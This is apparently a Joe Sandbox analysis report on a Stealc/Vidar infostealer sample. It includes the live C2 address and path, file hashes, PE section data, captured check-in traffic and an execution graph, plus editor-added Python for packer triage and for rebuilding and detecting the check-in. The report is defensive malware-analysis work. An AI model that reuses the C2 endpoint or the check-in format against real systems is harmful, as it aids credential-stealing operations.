                http://185.215.113.37/e2b1563c6670f193.phpr | file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37V | file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpy | file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpA | file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpe | file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php) | file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                (The trailing characters after .php in several entries are bytes that followed the URL string in memory, not part of the C2 path.)
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1531486
                      Start date and time:2024-10-11 09:44:31 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 55s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 88
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                (The SHA 256 column of the original is a link to each related sample and is not reproduced here.)
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                No context
                No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.949311322666154
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'852'416 bytes
                      MD5:1d5102a006a1f46ae6d349ca54497fc3
                      SHA1:9d2909785110f5795d032f46680c4fc173b38740
                      SHA256:aa9447ab2cb7ff4768b9782a6d5a79a71627b2d7c25ca662cd5614128eda50fe
                      SHA512:25ed8d30c6df14c13ed68913a103d546e88373a4b6942945deff1cbcdbdc1dec5bfe2dee9ea461f2030548887d13f9b9fe13929d424181db9d4e6ff9e6c96b6b
                      SSDEEP:49152:hAitgDhNQN40c7meFHojxnaDFKTDjtX5GGxHLOXii:hAiulNoLeFHoVaJPELO
                      TLSH:728533F79EA59853CA8C58F2F8873F9BAC7D4CA841C0E616541C857504F671C22BFBA2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0xaa1000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007EFEB8C2FB8Ah
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (no name) | 0x1000 | 0x25b000 | 0x22800 | 463a281b46dc2ec7348ecd20aa530128 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (no name) | 0x25e000 | 0x2a3000 | 0x200 | 98f6e46bece1bdff9807d5cf29aaccaf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                lkjltntr | 0x501000 | 0x19f000 | 0x19e200 | df6268b78e463d1a13df3dcd5b5447ac | False | 0.9950160824781165 | data | 7.9546951511511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                uktbgiwd | 0x6a0000 | 0x1000 | 0x400 | 800740d33e965f24ca6057c72da8bedf | False | 0.767578125 | data | 6.062534302850355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x6a1000 | 0x3000 | 0x2200 | 5995d202b30da4f81109adadc74b1058 | False | 0.05824908088235294 | DOS executable (COM) | 0.7176502069401235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
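                The section table and import list above are the static side of the "Detected unpacking", "Entry point lies outside standard sections" and "Extensive use of GetProcAddress" signatures: two sections have no name, five are readable, writable and executable, the first and fourth reserve far more virtual space than they carry on disk, one has an 8-bit entropy of 7.95, the entry point sits in .taggant, and the whole import table is kernel32!lstrcpy. The Python below is an added example by the editor (not Joe Sandbox's logic and not code from the report) that transcribes those values and applies the packer-triage heuristics a reviewer would run on any sample; the thresholds and the scoring are the editor's choices.

```python
"""Packer-triage heuristics over the section table and import list the report
prints for file.exe.  Added example: the data rows are transcribed from the
report, the rules and thresholds are the editor's, not Joe Sandbox's.
"""
from dataclasses import dataclass
from typing import List, Optional

IMAGEBASE = 0x400000
ENTRYPOINT = 0xAA1000           # absolute address, as the report prints it

EXECUTE, READ, WRITE = "EXECUTE", "READ", "WRITE"
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
HIGH_ENTROPY = 7.2              # 8-bit Shannon entropy; compressed/encrypted data sits near 8
INFLATED_MIN = 0x10000          # virtual size exceeding raw size by more than 64 KiB
TINY_IMPORTS = 3                # at most this many imported functions


@dataclass(frozen=True)
class Section:
    name: str
    va: int                     # RVA of the section start
    vsize: int
    raw: int
    entropy: Optional[float]    # None where the report prints "unknown"
    perms: frozenset


def sec(name, va, vsize, raw, entropy, *perms) -> Section:
    return Section(name, va, vsize, raw, entropy, frozenset(perms))


# Transcribed from the report's section table (name, VA, virtual size, raw size,
# entropy, memory characteristics).  Section alignment is 0x1000, so a virtual
# size that exceeds the raw size by a page is normal; megabytes are not.
SECTIONS: List[Section] = [
    sec("",         0x1000,   0x25B000, 0x22800,  None,  EXECUTE, READ, WRITE),
    sec(".rsrc",    0x25C000, 0x1000,   0x0,      0.0,   READ, WRITE),
    sec(".idata",   0x25D000, 0x1000,   0x200,    0.906, READ, WRITE),
    sec("",         0x25E000, 0x2A3000, 0x200,    None,  EXECUTE, READ, WRITE),
    sec("lkjltntr", 0x501000, 0x19F000, 0x19E200, 7.955, EXECUTE, READ, WRITE),
    sec("uktbgiwd", 0x6A0000, 0x1000,   0x400,    6.063, EXECUTE, READ, WRITE),
    sec(".taggant", 0x6A1000, 0x3000,   0x2200,   0.718, EXECUTE, READ, WRITE),
]
IMPORTS = {"kernel32.dll": ["lstrcpy"]}     # the complete import table from the report


def section_for_rva(sections: List[Section], rva: int) -> Optional[Section]:
    """Section whose in-memory range covers rva, the way the loader sees it."""
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.raw):
            return s
    return None


def triage(sections: List[Section], entrypoint: int, imports: dict,
           imagebase: int = IMAGEBASE) -> dict:
    """Collect packer indicators and a simple additive score."""
    ep = section_for_rva(sections, entrypoint - imagebase)
    f = {
        "entry_section": ep.name if ep else None,
        "entry_outside_standard": ep is None or ep.name not in STANDARD_NAMES,
        "rwx": [i for i, s in enumerate(sections) if {EXECUTE, READ, WRITE} <= s.perms],
        "unnamed": [i for i, s in enumerate(sections) if not s.name],
        "nonstandard_names": [s.name for s in sections if s.name and s.name not in STANDARD_NAMES],
        "high_entropy": [s.name for s in sections if s.entropy is not None and s.entropy >= HIGH_ENTROPY],
        # room reserved for code that only exists after runtime unpacking
        "inflated": [i for i, s in enumerate(sections) if s.vsize - s.raw > INFLATED_MIN],
        "tiny_import_table": sum(len(v) for v in imports.values()) <= TINY_IMPORTS,
    }
    f["score"] = sum([f["entry_outside_standard"], bool(f["rwx"]), bool(f["unnamed"]),
                      bool(f["high_entropy"]), bool(f["inflated"]), f["tiny_import_table"]])
    f["likely_packed"] = f["score"] >= 3
    return f


if __name__ == "__main__":
    for key, value in triage(SECTIONS, ENTRYPOINT, IMPORTS).items():
        print(f"{key:24} {value}")
```

                Every indicator fires on this file, which is why the dynamic unpack dump (0.2.file.exe.e20000.0.unpack) rather than the file on disk is where the Stealc YARA rules match. The import-directory RVA 0x25d050 resolves to .idata with the same lookup, which is a quick sanity check that the transcribed table is consistent.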
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-11T09:45:27.583709+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 11, 2024 09:45:26.604149103 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                Oct 11, 2024 09:45:26.609210968 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                Oct 11, 2024 09:45:26.609278917 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                Oct 11, 2024 09:45:26.609869003 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                Oct 11, 2024 09:45:26.614662886 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                Oct 11, 2024 09:45:27.338648081 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                Oct 11, 2024 09:45:27.338711977 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                Oct 11, 2024 09:45:27.344018936 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                Oct 11, 2024 09:45:27.348956108 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                Oct 11, 2024 09:45:27.583646059 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                Oct 11, 2024 09:45:27.583709002 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                Oct 11, 2024 09:45:31.045021057 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      • 185.215.113.37
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | 4132 | C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                Oct 11, 2024 09:45:26.609869003 CEST | 89 bytes | OUT | GET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                Oct 11, 2024 09:45:27.338648081 CEST | 203 bytes | IN | HTTP/1.1 200 OK
                      Date: Fri, 11 Oct 2024 07:45:27 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                Oct 11, 2024 09:45:27.344018936 CEST | 412 bytes | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 46 39 46 46 39 32 37 42 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a
                      Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="hwid"A5F9FF927BF51660493485------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build"doma------GDAAKFIDGIEGDGDHIDAK--
                Oct 11, 2024 09:45:27.583646059 CEST | 210 bytes | IN | HTTP/1.1 200 OK
                      Date: Fri, 11 Oct 2024 07:45:27 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=
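                The session above is the whole of the sample's network activity: an empty GET / to the C2, then one multipart/form-data POST to /e2b1563c6670f193.php carrying a hwid field and a build field ("doma"), answered with an 8-byte base64 body that decodes to the string block, after which no further request appears in the capture. The Python below is an added example by the editor, not code from the sample or from the report: it rebuilds the captured body byte-for-byte from the same boundary and field values (the rebuilt length matches the captured Content-Length of 211), parses it back, decodes the reply, and applies a detection heuristic for this check-in shape. The heuristic is the editor's own and is not the text of Suricata rule 2044243.

```python
"""Rebuild, parse and classify the Stealc check-in captured in the report.
Added example: boundary, field values and reply are copied from the capture;
the code and the heuristic are the editor's, not the malware's or the ET rule's.
"""
import base64
import re
from typing import Dict

BOUNDARY = "----GDAAKFIDGIEGDGDHIDAK"      # from the captured Content-Type header
HWID = "A5F9FF927BF51660493485"            # captured hwid field
BUILD = "doma"                             # captured build field
REPLY_B64 = b"YmxvY2s="                    # captured 8-byte response body
C2_HOST, C2_PATH = "185.215.113.37", "/e2b1563c6670f193.php"


def build_checkin(hwid: str, build: str, boundary: str = BOUNDARY) -> bytes:
    """multipart/form-data body with the two fields the sample sends on first contact."""
    parts = []
    for name, value in (("hwid", hwid), ("build", build)):
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; '
                     f'name="{name}"\r\n\r\n{value}\r\n')
    parts.append(f"--{boundary}--\r\n")    # closing delimiter
    return "".join(parts).encode("ascii")


def parse_form(body: bytes, boundary: str) -> Dict[str, str]:
    """Minimal multipart parser: split on the delimiter, stop at the closing one.
    Good enough for bodies like this one (no nested parts, no transfer encoding)."""
    delim = b"--" + boundary.encode("ascii")
    fields: Dict[str, str] = {}
    for chunk in body.split(delim)[1:]:    # [0] is the (empty) preamble
        if chunk.startswith(b"--"):        # "--boundary--" ends the body
            break
        head, _, value = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode("ascii")] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields


def decode_reply(body: bytes) -> str:
    """The C2 answers with a base64 text body; here it carries a single word."""
    return base64.b64decode(body).decode("ascii")


def looks_like_checkin(method: str, host: str, path: str,
                       content_type: str, fields: Dict[str, str]) -> bool:
    """Editor's heuristic for this check-in shape: a POST to a bare IPv4 host,
    a path of exactly 16 hex characters plus .php, a multipart body whose only
    fields are hwid and build.  Tune before deploying; it is not the ET rule."""
    return (method == "POST"
            and re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) is not None
            and re.fullmatch(r"/[0-9a-f]{16}\.php", path) is not None
            and content_type.startswith("multipart/form-data")
            and set(fields) == {"hwid", "build"})


if __name__ == "__main__":
    body = build_checkin(HWID, BUILD)
    fields = parse_form(body, BOUNDARY)
    print(len(body), fields, decode_reply(REPLY_B64))
    print(looks_like_checkin("POST", C2_HOST, C2_PATH,
                             "multipart/form-data; boundary=" + BOUNDARY, fields))
```

                The decoded reply is what the capture actually contains; the absence of a follow-up request in the session is consistent with the C2 declining this host, so the stealing routines the YARA rules and the GetUserNameA/GetComputerNameA/GetTimeZoneInformation calls point to were never exercised in this run. For a detection you would key on the fixed pair of field names and the 16-hex-character .php path rather than on the IP, which rotates between campaigns.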



                      Target ID:0
                      Start time:03:45:21
                      Start date:11/10/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0xe20000
                      File size:1'852'416 bytes
                      MD5 hash:1D5102A006A1F46AE6D349CA54497FC3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:8.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:10.1%
                        Total number of Nodes:2000
                        Total number of Limit Nodes: 24
                        execution_graph (serialized node/edge data of the interactive call graph; each node is a sequence number, the code address, and the Windows APIs called there, and "X->Y" entries are edges; the raw dump has been condensed here into the information it carries)
                        Top-level flow along the graph: e369f0 (root) -> e22260 (long chain of calls into e245c0) -> e39860 (LoadLibraryA / GetProcAddress resolution) -> e36a00 -> e211d0 -> e21160 -> e21110 -> e210a0 -> e21220 -> e36770 -> e21190 -> e37850 -> e378e0 -> e3a9b0 -> e36a64 -> e36ac2 -> e36920 -> e35b10 -> e226a0 (second long chain into e245c0) -> e39c10 (GetProcAddress resolution) -> e21590 -> e35510 -> e37500 -> e24880 -> e317a0 -> e25960 -> e31050 / e30d90 / e30f40 / e31a10 -> e24fb0 -> e30740
                        API calls the graph attaches to each function address:
                        e245c0: RtlAllocateHeap, VirtualProtect (called repeatedly from the e22260 and e226a0 chains)
                        e39750: GetPEB; e39a93: LoadLibraryA (x5); e3988c: 21 API calls; e39af4, e39b16, e39b4f, e39b71, e39b92: GetProcAddress
                        e39c20: 43 API calls; e3a036, e3a153: 8 API calls each; e3a2a5: 6 API calls; e3a344: 9 API calls; e3a522: 10 API calls; e3a0cc, e3a21f, e3a428, e3a4ab, e3a4e5, e3a61b, e3a686, e3a6a7: GetProcAddress
                        e3a740, e3a7a0, e3a8a0: lstrcpy; e3a820: lstrlen, lstrcpy; e3a9b0: lstrlen, lstrcpy, lstrcat; e3a920: 3 API calls
                        e211d0 -> e2120f: ExitProcess; e21160: GetSystemInfo; e2117c: ExitProcess; e21110: GetCurrentProcess, VirtualAllocExNuma; e21141: ExitProcess; e210a0: VirtualAlloc; e210e2: VirtualFree; e21233: GlobalMemoryStatusEx; e21249: __aulldiv; e21292: ExitProcess; e211c4: ExitProcess
                        e36770: GetUserDefaultLangID, followed by five ExitProcess branches (e367a3, e367ad, e367b7, e367c1, e367cb)
                        e37850: GetProcessHeap, RtlAllocateHeap, GetUserNameA; e378e0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA
                        e36ac2: OpenEventA; e36ae1: CreateEventA; e36af5: CloseHandle, Sleep
                        e36920: GetSystemTime; e36998: sscanf; e369aa: SystemTimeToFileTime (x2); e369d8: ExitProcess
                        e37500: GetWindowsDirectoryA; e37553: GetVolumeInformationA; e375fc: GetProcessHeap, RtlAllocateHeap; e37628: wsprintfA
                        e35643, e356a0, e3578a, e35856, e3593f, e35a0b: StrCmpCA; e35a16: Sleep
                        e25960: 34 API calls; e351f0: 20 API calls; e352c0: 25 API calls
                        e24fb0: GetProcessHeap, RtlAllocateHeap, InternetOpenA; e2490b: InternetOpenA, StrCmpCA; e24aa3: InternetConnectA; e24ad3: HttpOpenRequestA; e24ebe, e24ecb: InternetCloseHandle; e29ac0: CryptStringToBinaryA
API calls 14699->14700 14701 e24d47 14700->14701 14702 e3a8a0 lstrcpy 14701->14702 14703 e24d50 14702->14703 14704 e3a920 3 API calls 14703->14704 14705 e24d6e 14704->14705 14706 e3a8a0 lstrcpy 14705->14706 14707 e24d77 14706->14707 14708 e3a740 lstrcpy 14707->14708 14709 e24d92 14708->14709 14710 e3a920 3 API calls 14709->14710 14711 e24db3 14710->14711 14712 e3a920 3 API calls 14711->14712 14713 e24dba 14712->14713 14714 e3a8a0 lstrcpy 14713->14714 14715 e24dc6 14714->14715 14716 e24de7 lstrlen 14715->14716 14717 e24dfa 14716->14717 14718 e24e03 lstrlen 14717->14718 15657 e3aad0 14718->15657 14720 e24e13 HttpSendRequestA 14721 e24e32 InternetReadFile 14720->14721 14722 e24e67 InternetCloseHandle 14721->14722 14727 e24e5e 14721->14727 14725 e3a800 14722->14725 14724 e3a9b0 4 API calls 14724->14727 14725->14647 14726 e3a8a0 lstrcpy 14726->14727 14727->14721 14727->14722 14727->14724 14727->14726 15664 e3aad0 14728->15664 14730 e317c4 StrCmpCA 14731 e317d7 14730->14731 14732 e317cf ExitProcess 14730->14732 14733 e319c2 14731->14733 14734 e318cf StrCmpCA 14731->14734 14735 e318ad StrCmpCA 14731->14735 14736 e31913 StrCmpCA 14731->14736 14737 e31932 StrCmpCA 14731->14737 14738 e318f1 StrCmpCA 14731->14738 14739 e31951 StrCmpCA 14731->14739 14740 e31970 StrCmpCA 14731->14740 14741 e3187f StrCmpCA 14731->14741 14742 e3185d StrCmpCA 14731->14742 14743 e3a820 lstrlen lstrcpy 14731->14743 14733->13651 14734->14731 14735->14731 14736->14731 14737->14731 14738->14731 14739->14731 14740->14731 14741->14731 14742->14731 14743->14731 14745 e3a7a0 lstrcpy 14744->14745 14746 e25979 14745->14746 14747 e247b0 2 API calls 14746->14747 14748 e25985 14747->14748 14749 e3a740 lstrcpy 14748->14749 14750 e259ba 14749->14750 14751 e3a740 lstrcpy 14750->14751 14752 e259c7 14751->14752 14753 e3a740 lstrcpy 14752->14753 14754 e259d4 14753->14754 14755 e3a740 lstrcpy 14754->14755 14756 e259e1 14755->14756 14757 e3a740 lstrcpy 14756->14757 14758 e259ee InternetOpenA StrCmpCA 14757->14758 14759 
e25a1d 14758->14759 14760 e25fc3 InternetCloseHandle 14759->14760 14761 e38b60 3 API calls 14759->14761 14762 e25fe0 14760->14762 14763 e25a3c 14761->14763 14765 e29ac0 4 API calls 14762->14765 14764 e3a920 3 API calls 14763->14764 14766 e25a4f 14764->14766 14767 e25fe6 14765->14767 14768 e3a8a0 lstrcpy 14766->14768 14769 e3a820 2 API calls 14767->14769 14772 e2601f ctype 14767->14772 14774 e25a58 14768->14774 14770 e25ffd 14769->14770 14771 e3a9b0 4 API calls 14770->14771 14773 e26013 14771->14773 14776 e3a7a0 lstrcpy 14772->14776 14775 e3a8a0 lstrcpy 14773->14775 14777 e3a9b0 4 API calls 14774->14777 14775->14772 14785 e2604f 14776->14785 14778 e25a82 14777->14778 14779 e3a8a0 lstrcpy 14778->14779 14780 e25a8b 14779->14780 14781 e3a9b0 4 API calls 14780->14781 14782 e25aaa 14781->14782 14783 e3a8a0 lstrcpy 14782->14783 14784 e25ab3 14783->14784 14786 e3a920 3 API calls 14784->14786 14785->13657 14787 e25ad1 14786->14787 14788 e3a8a0 lstrcpy 14787->14788 14789 e25ada 14788->14789 14790 e3a9b0 4 API calls 14789->14790 14791 e25af9 14790->14791 14792 e3a8a0 lstrcpy 14791->14792 14793 e25b02 14792->14793 14794 e3a9b0 4 API calls 14793->14794 14795 e25b21 14794->14795 14796 e3a8a0 